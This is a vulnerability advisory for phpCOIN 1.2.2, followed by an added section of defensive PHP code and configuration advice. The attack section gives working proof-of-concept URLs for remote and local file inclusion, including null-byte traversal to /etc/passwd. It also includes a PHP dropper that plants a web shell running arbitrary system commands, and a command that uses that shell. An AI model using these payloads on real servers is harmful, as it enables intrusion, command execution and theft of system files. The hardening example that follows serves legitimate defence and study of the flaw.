PhpCOIN 1.2.2 arbitrary remote/local inclusion / blind SQL injection / path disclosure

software:
site:
description: "a free software package originally designed for web-hosting resellers to handle clients, orders, invoices, notes and helpdesk, but no longer limited to hosting resellers. phpCOIN is used by over twenty-five thousand people worldwide*, including web-hosts, designers, lawyers, accountants, and a school band"

i) arbitrary remote/local inclusion:

vulnerable code in coin_includes/db.php at lines 30-39:

...
# Determine Database and include proper class file
switch($_DBCFG['dbms']) {
    case "mysql":
        require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php');
        break;
    default:
        require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php');
        break;
}
...

$_CCFG['_PKG_PATH_DBSE'] is never initialised before this point, so with register_globals on its value comes straight from the request. Note that the script appends the fixed name 'db_mysql.php' to whatever path is supplied.

If register_globals is on and allow_url_fopen is on, you can include an arbitrary file from a remote location, poc:

http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location]

Because 'db_mysql.php' is appended, the target fetches http://[location]db_mysql.php; serve the payload from a directory named db_mysql.php so that the remote web server answers with its index. On the remote location you have this code in http://[remote_location]/db_mysql.php/index.html:

<?php
// dropper: writes a one-line web shell into the target's web root
$fp=fopen("suntzu.php","w");
fputs($fp,"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0); system(\$HTTP_GET_VARS[cmd]);?>");
fclose($fp);
?>

then you launch commands:

http://[target]/[path]/suntzu.php?cmd=cat%20/etc/passwd

If register_globals is on and magic_quotes_gpc is off (so the %00 null byte is not escaped and truncates the appended 'db_mysql.php'), you can include an arbitrary file from local resources, poc:

http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00
http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00

exploit tool here:

ii) if magic_quotes_gpc is off -> SQL injection through cookies:

exploit code here:

iii) path disclosure, simply:

http://[target]/[path]/config.php

because in coin_includes/db.php _CCFG['_PKG_PATH_DBSE'] is not defined: with display_errors on, the resulting PHP notice and the failed require_once print the absolute filesystem path of the script.

rgod
site:
mail: retrogod at aliceposta it
original advisory:
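The root cause in section i) is that the include path is read from a global the request can overwrite and that the driver name is never validated. The block below is an added example (my own code, not phpCOIN's) of how the include in coin_includes/db.php could be written so that neither register_globals nor a null byte can steer require_once. It assumes the driver class files live in a "dbse/" directory next to db.php and that the supported drivers are listed in $drivers; both the directory name and the list are assumptions for illustration.

```php
<?php
// Added example, not phpCOIN code: a hardened replacement for the
// switch/require_once block quoted in section i).

// 1. Derive the driver directory from this file's own location instead of
//    $_CCFG['_PKG_PATH_DBSE'], a global that register_globals lets a
//    request set (the remote/local inclusion vector). "dbse/" is assumed.
define('PKG_PATH_DBSE', dirname(__FILE__) . DIRECTORY_SEPARATOR . 'dbse' . DIRECTORY_SEPARATOR);

// 2. Allow-list of supported drivers: the request may pick a key, never a
//    path. $_DBCFG['dbms'] is used as in the original; unknown values are
//    rejected before any string reaches require_once.
$drivers = array('mysql' => 'db_mysql.php');

$dbms = isset($_DBCFG['dbms']) ? (string) $_DBCFG['dbms'] : 'mysql';
if (!isset($drivers[$dbms])) {
    // Generic error, no path and no PHP notice: nothing for a
    // path-disclosure probe like the one in section iii) to read.
    header('HTTP/1.0 500 Internal Server Error');
    exit('Unsupported database driver.');
}

$driverFile = PKG_PATH_DBSE . $drivers[$dbms];

// 3. Defence in depth: resolve the final path and confirm it still sits
//    under the driver directory. This catches ../ traversal and the %00
//    truncation trick should the allow-list ever be loosened, and keeps
//    http:// wrappers out because realpath() only resolves local files.
$real = realpath($driverFile);
if ($real === false || strpos($real, realpath(PKG_PATH_DBSE)) !== 0) {
    header('HTTP/1.0 500 Internal Server Error');
    exit('Database driver not found.');
}

require_once $real;
?>
```

On the server side the same issues are closed by configuration: register_globals = Off removes the vector entirely, allow_url_fopen = Off (allow_url_include = Off on PHP 5.2+) stops the remote case, and display_errors = Off stops the path disclosure in iii); the code change above is what protects an install where those settings cannot be controlled.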